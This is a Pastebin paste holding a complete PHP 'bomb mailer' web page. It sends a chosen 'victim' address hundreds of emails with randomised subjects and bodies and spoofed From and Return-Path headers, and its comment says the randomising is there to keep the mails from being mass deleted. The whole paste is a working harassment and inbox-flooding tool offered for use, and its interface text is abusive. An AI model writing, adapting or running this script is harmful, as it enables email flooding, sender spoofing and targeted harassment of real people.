Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- http://p4ste.tumblr.com
- <title>lawlmailer</title>
- <style>
- body {
- font-family: Verdana;
- font-size: 18px;
- }
- input {
- background-color: #FFFFFF;
- font-family: Verdana;
- font-size: 18px;
- border: 2px solid #000000;
- }
- </style>
- <?php
- set_time_limit(0);
- // newer bomb mailer script, designed to send random data each time to help prevent mails from being mass deleted
- if ($_POST[to] && $_POST[x] >= 1 && is_numeric($_POST[x])) {
- for($i = 1; $i <= $_POST[x]; $i ++) {
- $random = rand(0,9999);
- $t = $_POST[to];
- $b = base64_encode(md5($random*$i));
- $s = base64_encode(md5($random*2*$i));
- $one = md5($random+$i);
- $two = md5($random-$i);
- $s = str_replace("=", "", $s);
- $b = str_replace("=", "", $b);
- $h = "Return-Path: <$one@$two.com>\nFrom: $one@$two.com";
- @mail($t, $s, $b, $h);
- ob_flush();
- flush();
- print "mailed #$i of $_POST[x]<br>";
- }
- } else {
- print "Welcome! Choose now whom is the victim and how many the victim shall receive.<br><br><br>
- <form action=\"$_SERVER[PHP_SELF]\" method=post>
- email <input type=text name=to> x <input type=text name=x value=300 size=5> = LOL WUT<br><br>
- <input type=submit value=\"bomb that bitch\">
- </form>";
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement